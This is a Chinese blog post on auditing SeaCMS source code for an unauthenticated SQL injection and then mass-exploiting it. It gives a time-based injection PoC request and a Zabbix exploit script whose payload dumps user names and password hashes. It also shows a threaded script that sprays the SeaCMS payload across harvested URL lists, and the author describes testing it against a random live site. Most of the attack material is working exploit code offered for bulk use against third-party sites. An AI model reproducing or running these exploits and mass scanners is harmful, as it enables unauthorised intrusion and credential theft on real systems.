浅谈代码审计+漏洞批量一把梭哈思路
moboyou 2025-08-02 20:13 4 浏览
前言
最近在学习 src 的挖掘,常规的 src 挖掘就是信息泄露,什么逻辑漏洞什么的,什么越权漏洞,但是说实话,挖掘起来不仅需要很多时间,而且还需要很多经验,当然其实还有一种挖掘的办法,就是利用刚出的 1day 去批量扫描,如果自己会代码审计的话,就再好不过了,下面给大家分享分享整个过程是怎么样的
工具介绍
项目地址
https://github.com/W01fh4cker/Serein
【懒人神器】一款图形化、批量采集 url、批量对采集的 url 进行各种 nday 检测的工具。可用于 src 挖掘、cnvd 挖掘、0day 利用、打造自己的武器库等场景。可以批量利用 Actively Exploited Atlassian Confluence 0Day CVE-2022-26134 和 DedeCMS v5.7.87 SQL 注入 CVE-2022-23337。
具体使用方法下面会介绍
漏洞样本
本次选取的是一个前些天看到的 seacms 的一个 sql 注入,当时也是自己也审计了一波的
这里给出审计的过程
/js/player/dmplayer/dmku/index.php 未授权 sql 注入
这个相比于上一个来说是危害更大,因为不需要登录 admin 用户
确实是 sleep 了,说明漏洞存在,我们看到代码
if ($_GET['ac'] == "edit") {
$cid = $_POST['cid'] ?: showmessage(-1, null);
$data = $d->编辑弹幕($cid) ?: succeedmsg(0, '完成');
exit;
}
我们跟进编辑弹幕方法
一路来到
public static function 编辑_弹幕($cid)
{
try {
global $_config;
$text = $_POST['text'];
$color = $_POST['color'];
$conn = @new mysqli($_config['数据库']['地址'], $_config['数据库']['用户名'], $_config['数据库']['密码'], $_config['数据库']['名称'], $_config['数据库']['端口']);
$sql = "UPDATE sea_danmaku_list SET text='$text',color='$color' WHERE cid=$cid";
$result = "UPDATE sea_danmaku_report SET text='$text',color='$color' WHERE cid=$cid";
$conn->query($sql);
$conn->query($result);
} catch (PDOException $e) {
showmessage(-1, '数据库错误:' . $e->getMessage());
}
}
这里我们可以看到查询又是使用的原生的 query 方法,所以并没有过滤
所以导致 sql 注入
还有我们看到当 ac=del,type=list 的时候
else if ($_GET['ac'] == "del") {
$id = $_GET['id'] ?: succeedmsg(-1, null);
$type = $_GET['type'] ?: succeedmsg(-1, null);
$data = $d->删除弹幕($id) ?: succeedmsg(0, []);
succeedmsg(23, true);
进入删除弹幕($id)
public function 删除弹幕($id)
{
//sql::插入_弹幕($data);
sql::删除_弹幕数据($id);
}
进入 sql::删除_弹幕数据($id);
public static function 删除_弹幕数据($id)
{
try {
global $_config;
$conn = @new mysqli($_config['数据库']['地址'], $_config['数据库']['用户名'], $_config['数据库']['密码'], $_config['数据库']['名称'], $_config['数据库']['端口']);
$conn->set_charset('utf8');
if ($_GET['type'] == "list") {
$sql = "DELETE FROM sea_danmaku_report WHERE cid={$id}";
$result = "DELETE FROM sea_danmaku_list WHERE cid={$id}";
$conn->query($sql);
$conn->query($result);
} elseif ($_GET['type'] == "report") {
$sql = "DELETE FROM sea_danmaku_report WHERE cid={$id}";
$conn->query($sql);
}
} catch (PDOException $e) {
showmessage(-1, '数据库错误:' . $e->getMessage());
}
}
我们的 id 是可以控制的,type 也是可以控制的,而且没有任何的过滤,当 type=list 的时候,直接放进 query 函数进行查询
漏洞验证
POC
GET /js/player/dmplayer/dmku/index.php?ac=del&id=(select(1)from(select(sleep(6)))x)&type=list HTTP/1.1
Host: seacms:8181
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://seacms:8181/js/player/dmplayer/dmku/index.php?ac=del&id=(select(1)from(select(sleep(0)))x)&type=list
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=5dl35hp50uj606p52se8kg91a2; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; XDEBUG_SESSION=PHPSTORM
Connection: keep-alive
效果如图,可以发现确实延迟了 6 秒
工具利用过程
首先就是看工具的逻辑是如何添加漏洞的
首先看主文件
代码很长,说一下我们需要注意的点,首先就是配置,对于的 fofa 配置如下
需要你进入工具的时候配置邮箱和 key
def fofa_saveit_first():
email = fofa_text1.get()
key = fofa_text2.get()
with open("fofa配置.conf","a+") as f:
f.write(f"[data]\nemail={email}\nkey={key}")
f.close()
showinfo("保存成功!","请继续使用fofa搜索模块!下一次将自动读取,不再需要配置!")
text3.insert(END,f"【+】保存成功!请继续使用fofa搜索模块!下一次将会自动读取,不再需要配置!您的email是:{email};为保护您的隐私,api-key不会显示。\n")
text3.see(END)
fofa_info.destroy()
def fofa_saveit_twice():
global email_r,key_r
if not os.path.exists("fofa配置.conf"):
fofa_saveit_first()
else:
email_r = getFofaConfig("data", "email")
key_r = getFofaConfig("data", "key")
def fofa_info():
global fofa_info,fofa_text1,fofa_text2,fofa_text3
fofa_info= tk.Tk()
fofa_info.title("fofa配置")
fofa_info.geometry('230x100')
fofa_info.resizable(0, 0)
fofa_info.iconbitmap('logo.ico')
fofa_email = tk.StringVar(fofa_info,value="填注册fofa的email")
fofa_text1 = ttk.Entry(fofa_info, bootstyle="success", width=30, textvariable=fofa_email)
fofa_text1.grid(row=0, column=1, padx=5, pady=5)
fofa_key = tk.StringVar(fofa_info,value="填email对应的key")
fofa_text2 = ttk.Entry(fofa_info, bootstyle="success", width=30, textvariable=fofa_key)
fofa_text2.grid(row=1, column=1, padx=5, pady=5)
button1 = ttk.Button(fofa_info, text="点击保存", command=fofa_saveit_twice, width=30, bootstyle="info")
button1.grid(row=2, column=1, padx=5, pady=5)
fofa_info.mainloop()
使用 fofa 的处理流程
后续是通过 fofa 的 api 进行查询的,所以需要你的 api,只有 vip 才有这个功能
然后下面是脚本调用逻辑
因为一个漏洞是需要你自己写一个 python 脚本的
然后加入你自己自定义的漏洞是在
这个逻辑应该很好理解,比如我的就是
button50 = ttk.Button(group3,text="seacms前台sql注入",command=sql_injection_gui,width=45,bootstyle="primary")
button50.grid(row=15,column=2,columnspan=2,padx=5,pady=5)
然后就是写对应的利用脚本了
因为我们写的脚本是需要贴合工具的,所以先随便找一个脚本看看大概的架构是怎么样的
工具自带了许许多多的利用脚本,我们看一下如何仿写
比如 zabbix_sql.py
import requests
import tkinter as tk
from tkinter import scrolledtext
from concurrent.futures import ThreadPoolExecutor
from ttkbootstrap.constants import *
"""
Zabbix ‘popup.php’SQL注入漏洞
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201112-017
Zabbix的popup.php中存在SQL注入漏洞。远程攻击者可借助only_hostid参数执行任意SQL命令。
"""
def zabbix_sql_exp(url):
poc = r"""popup.php?dstfrm=form_scenario&dstfld1=application&srctbl=applications&srcfld1=name&only_hostid=1))%20union%20select%201,group_concat(surname,0x2f,passwd)%20from%20users%23"""
target_url = url + poc
status_str= ['Administrator', 'User']
try:
res = requests.get(url, Verify=False,timeout=3)
if res.status_code == 200:
target_url_payload = f"{target_url}"
res = requests.get(url=target_url_payload,Verify=False)
if res.status_code == 200:
for i in range(len(status_str)):
if status_str[i] in res.text:
zabbix_sql.insert(END,"【*】存在漏洞的url:" + url + "\n")
zabbix_sql.see(END)
with open("存在Zabbix—SQL注入漏洞的url.txt", 'a') as f:
f.write(url + "\n")
else:
target_url = url + '/zabbix/' + poc
res= requests.get(url=target_url,verify=False)
for i in range(len(status_str)):
if status_str[i] in res.text:
zabbix_sql.insert(END, "【*】存在漏洞的url:" + url + "\n")
zabbix_sql.see(END)
with open("存在Zabbix—SQL注入漏洞的url.txt", 'a') as f:
f.write(url + "\n")
else:
zabbix_sql.insert(END, "【×】不存在漏洞的url:" + url + "\n")
zabbix_sql.see(END)
except Exception as err:
zabbix_sql.insert(END, "【×】目标请求失败,报错内容:" + str(err) + "\n")
zabbix_sql.see(END)
def get_zabbix_addr():
with open("url.txt","r") as f:
for address in f.readlines():
address = address.strip()
yield address
def zabbix_sql_gui():
zabbix_sql_poc = tk.Tk()
zabbix_sql_poc.geometry("910x450")
zabbix_sql_poc.title("Zabbix—SQL注入 漏洞一把梭")
zabbix_sql_poc.resizable(0, 0)
zabbix_sql_poc.iconbitmap('logo.ico')
global zabbix_sql
zabbix_sql= scrolledtext.ScrolledText(zabbix_sql_poc,width=123, height=25)
zabbix_sql.grid(row=0, column=0, padx=10, pady=10)
zabbix_sql.see(END)
addrs = get_zabbix_addr()
max_thread_num = 30
executor = ThreadPoolExecutor(max_workers=max_thread_num)
for addr in addrs:
future = executor.submit(zabbix_sql_exp, addr)
zabbix_sql_poc.mainloop()
大概的架构就是访问地址,发送 paylaod,然后对应利用成功和失败的特征进行鉴定,然后就是最后的 gui 模块
因此我们可以对应的写出一个脚本,我按照我的漏洞写出的脚本如下
import requests
import time
import tkinter as tk
from tkinter import scrolledtext
from concurrent.futures import ThreadPoolExecutor
from ttkbootstrap.constants import *
# 执行SQL注入检测的函数
def sql_injection_exp(url):
target = url + "/js/player/dmplayer/dmku/index.php?ac=edit"
data = {
"cid": "(select(1)from(select(sleep(6)))x)",
"text": "1",
"color": "1"
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded"
}
start_time = time.time()
try:
response = requests.post(target, data=data, headers=headers, timeout=10)
elapsed_time = time.time() - start_time
if elapsed_time > 5:
output_text.insert(END, f"【*】找到SQL注入在 {target} (响应时间: {elapsed_time:.2f} 秒)\n")
output_text.see(END)
with open("找到sql注入的url.txt", 'a') as f:
f.write(url + "\n")
else:
output_text.insert(END, f"【×】没有SQL注入在 {target} (响应时间: {elapsed_time:.2f} 秒)\n")
output_text.see(END)
except requests.exceptions.RequestException as err:
output_text.insert(END, f"【×】目标请求失败:{target},错误内容:{err}\n")
output_text.see(END)
# 获取URL地址的生成器
def get_urls():
with open('url.txt', 'r') as file:
for line in file.readlines():
yield line.strip()
# GUI界面
def sql_injection_gui():
root = tk.Tk()
root.geometry("910x450")
root.title("seacms前台sql注入")
root.resizable(0, 0)
global output_text
output_text= scrolledtext.ScrolledText(root, width=123, height=25)
output_text.grid(row=0, column=0, padx=10, pady=10)
urls = get_urls()
max_threads = 30 # 并发线程数
executor = ThreadPoolExecutor(max_workers=max_threads)
for url in urls:
future = executor.submit(sql_injection_exp, url)
root.mainloop()
然后添加好模块
可以看见是添加成功了的
实战演示
首先就是搜集 url 了,配置好了之后只需要
因为我没有 fofa 的会员,这里使用自己搜集的 url,放在一个文件里面的,如果有的话就不需要我这样操作了
然后来到你需要利用的板块
利用的效果
然后我们可以随便找个网址验证一下
进入网址效果如下,说明网址还在正常使用的
然后测试漏洞
可以看见漏洞是存在的
然后就是查权重了
i
这个可以一把梭哈的
相关推荐
- discuz!论坛系统项目安装手册(discuz论坛纯白简约模板)
-
云服务器部署论坛系统discuz1.Logo2.安装LAMP[root@apache~]#yum-yinstallhttpdmariadb-servermariadbphpphp-...
- 2025年数据安全新趋势:10种防泄漏方法守护企业机密
-
1.Ping32:一体化数据安全防护专家Ping32构建起一体化数据安全防护体系,宛如为企业打造了一座坚不可摧的数据堡垒。它集文档智能加密、DLP与实时态势感知于一身,全方位守护企业数据安全。文...
- 篡改企业系统数据!男子非法获利20余万元被批捕
-
在数字化时代,网络技术的迅猛发展给我们的生活带来了便利,但同时也伴随着一些不法分子的恶行。近日,雨花区人民检察院通报一起关于犯罪嫌疑人邓某利用技术手段篡改系统数据,来牟取利益的案件。案情回顾邓某,原本...
- 生物识别信息纳入电子数据剑指网络犯罪 最高检副检察长就办理网络犯罪案件规定答记者问
-
最高人民检察院近日发布《人民检察院办理网络犯罪案件规定》(以下简称《规定》)。2月26日,就《规定》出台的背景、网络犯罪案件审查的特点等有关问题,最高检副检察长孙谦回答了记者提问。记者:请您介绍一下发...
- “网红AI”写作技巧惊人?英媒:大学生用其完成考试答题能拿满分
-
【环球时报综合报道】人工智能研究机构OpenAI日前发布的全新聊天机器人模型ChatGPT,不仅会自动修复bug,还拥有华丽的写作技巧,面对各种话题都能侃侃而谈,迅速成为“网红AI”。2015年,马斯...
- 在移动端轻松查看网页源代码:View Source 2.0
-
如果你是一名站长或Web开发者,在浏览器中查看网页源代码(HTML、CSS与JavaScript)是每天必不可少的操作,这个在桌面端轻而易举的操作到了移动端却变成了一件麻烦事。如今有了Vie...
- 基于Python的邮件管理系统设计与实现-计算机毕业设计源码+LW文档
-
摘要电子邮件,作为信息化时代的核心沟通工具,对日常生活与工作具有深远的影响。这个互联网技术下的产物,尽管为全球网络用户带来了沟通上的便利,但同时也面临着许多的挑战。尤其是是信息爆炸导致的邮件过多、垃...
- 半成品游戏源代码185.77万元起拍?拍卖方:原公司开发曾投入超千万元
-
近日,阿里司法拍卖网挂出一宗特殊标的——开发程度仅为40%,名为《代号:TD》的游戏的源代码及部分美术资源,起拍价185.77万元。有网友截图发到社交平台引发热议。100多万元的高价与“残缺项目”的反...
- 谷歌变更安卓平台开发流程 否认转向闭源 会对行业产生什么影响?
-
“谷歌将终止开源安卓”的消息这两天在网上引发广泛关注。但谷歌在一封与合作伙伴的沟通信中表示,虽然对安卓开发模式进行了变更,并不意味着将转向闭源。那么,这样的改变到底会对行业产生什么样的影响呢?我们来听...
- 白山云科技:云抗D、云WAF没效果?警惕源IP暴露
-
互联网攻防之战已经持续了数十年,随着企业安全意识的提高、安全措施的完善,各类安全防护产品以及云安全厂商为企业业务架起了一面“安全之盾”,阻挡着网络空间中的危机风险。然而,近期时常发生令企业用...
- Foxmail『快捷键』运用知多少?(foxmail发送邮件快捷键)
-
本文主要介绍关于Foxmail客户端快捷键的运用。系统默认快捷键如下所示:主窗口打开邮件Ctrl+O写新邮件Ctrl+N收取当前邮箱的邮件F2收取所有邮箱的邮件F4回复Ctrl+R回复所有...
- 俄罗斯黑客获得了微软的电子邮件和源代码
-
微软这家Windows公司几周前就发现了犯罪分子对其系统的访问,而且它无法摆脱明显的俄罗斯攻击者。这会产生后果。微软并没有将俄罗斯黑客从其系统中清除,这些黑客最近访问了该公司一些高级管理人员的电子邮件...
- Gmail API配置+Python实现google邮件发送完整指南,出海必备!
-
最近在做个海外项目,需要使用邮箱通知功能!最开始时候用的163邮箱发现各种收件延迟,无奈之下决定弃用国内邮箱,改用海外最大用户平台谷歌的gmail进行邮件发送。不过登录最新的Gmail邮箱设置界面,可...
- 在电影里,一封电子邮件人命攸关丨夜问
-
答案:从上至下剧照分别来自电影《电子情书》《源代码》《隐形人》《实习生》。《电子情书》中,男女主角靠电子邮件相识、相爱。《源代码》男主角最后一次进入平行时空后给女军官古德温发了一封邮件,告诉她源代码可...
- Python数据分析实战-正则提取文本的URL网址和邮箱(源码和效果)
-
实现功能:Python数据分析实战-利用正则表达式提取文本中的URL网址和邮箱实现代码:importre#python正则表达式提取网址myString='https://gith...
- 一周热门
- 最近发表
-
- discuz!论坛系统项目安装手册(discuz论坛纯白简约模板)
- 2025年数据安全新趋势:10种防泄漏方法守护企业机密
- 篡改企业系统数据!男子非法获利20余万元被批捕
- 生物识别信息纳入电子数据剑指网络犯罪 最高检副检察长就办理网络犯罪案件规定答记者问
- “网红AI”写作技巧惊人?英媒:大学生用其完成考试答题能拿满分
- 在移动端轻松查看网页源代码:View Source 2.0
- 基于Python的邮件管理系统设计与实现-计算机毕业设计源码+LW文档
- 半成品游戏源代码185.77万元起拍?拍卖方:原公司开发曾投入超千万元
- 谷歌变更安卓平台开发流程 否认转向闭源 会对行业产生什么影响?
- 白山云科技:云抗D、云WAF没效果?警惕源IP暴露
- 标签列表
-
- 外键约束 oracle (36)
- oracle的row number (32)
- 唯一索引 oracle (34)
- oracle in 表变量 (28)
- oracle导出dmp导出 (28)
- oracle两个表 (20)
- oracle 数据库 字符集 (20)
- matlab化简多项式 (20)
- 多线程的创建方式 (29)
- 多线程 python (30)
- java多线程并发处理 (32)
- 宏程序代码一览表 (35)
- c++需要学多久 (25)
- css class选择器用法 (25)
- css样式引入 (30)
- css教程文字移动 (33)
- php简单源码 (36)
- php个人中心源码 (25)
- php小说爬取源码 (23)
- 云电脑app源码 (22)
- html画折线图 (24)
- docker好玩的应用 (28)
- linux有没有pe工具 (34)
- mysql数据库源码 (21)
- php开源万能表单系统源码 (21)